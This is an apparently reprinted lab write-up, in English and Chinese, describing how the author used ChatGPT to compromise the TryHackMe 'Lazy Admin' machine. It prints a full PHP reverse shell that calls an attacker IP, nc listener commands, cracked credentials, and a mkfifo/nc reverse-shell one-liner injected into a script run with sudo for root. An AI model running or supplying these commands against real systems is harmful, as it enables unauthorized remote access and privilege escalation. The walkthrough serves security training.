Reprinted from Security Help Liveive
How ChatGPT helps us infiltrate.
Using chatGPT to infiltrate a linux machine " Lazy Admin " on tryhackme.com .
Assuming I only have some basic hacking knowledge, then we can ask what should be the first step of ChatGPT penetration.
It tells us that we should collect target information and find target vulnerabilities by performing a network scan, and also recommends using nmap. Then ask about ChatGPT usage for Nmap scanning in Linux.
This is the IP of the target, try to infiltrate.
I modified the grammar to run faster! Scan result: 22, 80 is open, try to access port 80.
80 running Apache2.
Ask ChatGPT how to perform penetration testing on web servers.
It tells us to scan the directory with gobuster
Get sensitive directory
/content (Status: 301) [Size: 316] [--> http://10.10.117.255/content/
Get the CMS version. Use GoBuster to scan the content directory again.
More directories were found,
Find the SQL backup directory and find the .SQL file, and find the password hash in the SQL file
Then ask ChatGPT how we should use these password hashes.
Do what it says. Crack the password hash using the CrackStation platform. https://crackstation.net/
The cracked password is Password123. Use the cracked password to log in to the background of the website.
用户名:manager 密码:Password123
In the Ads section, you can add a script to get the reverse connection, I prepared the Php reverse shell in advance. Ask ChatGPT, how to use php reverse shell script.
It gives a try using pentest monkey. Here is the code for the pentest monkey!
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.35'; // You have changed this
$port = 4420; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
functionprintit ($string) {
if (!$daemon) {
print "$string
";
}
}
?>
复制代码到Ads section创建一个文件。不要忘记更改 IP 和端口。设置您的 tun0 IP 并将端口更改为 9001。
修改后
点击Done后,会在目录生成反弹php脚本 .如下所示。
使用nc监听,获取反弹shell。
nc -lvnp 9001
访问revshell.php,就会建立连接!
进入主目获取 flag.txt
将此复制粘贴到此处,这台机器将被视为被黑。
接下来,我们需要进行权限提升并获取 root 。输入以下命令
python3 -c 'import pty;pty.spawn("/bin/bash")'接下来,输入这个,再次将其更改为 tun0 IP。
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.39.120 443 >//tmp/f" > /etc/copy.sh现在,在端口 443 上启动另一个监听,如下所示:
最后,执行最后一个命令,将获得root权限
sudo perl /home/itguy/backup.pl
成功获取权限
这是第一篇简单介绍如何使用 ChatGPT 渗透测试的文章。在不久的将来,我会写更多关于 ChatGPT 的渗透文章。
转载自安全帮Live,如有侵权请联系删除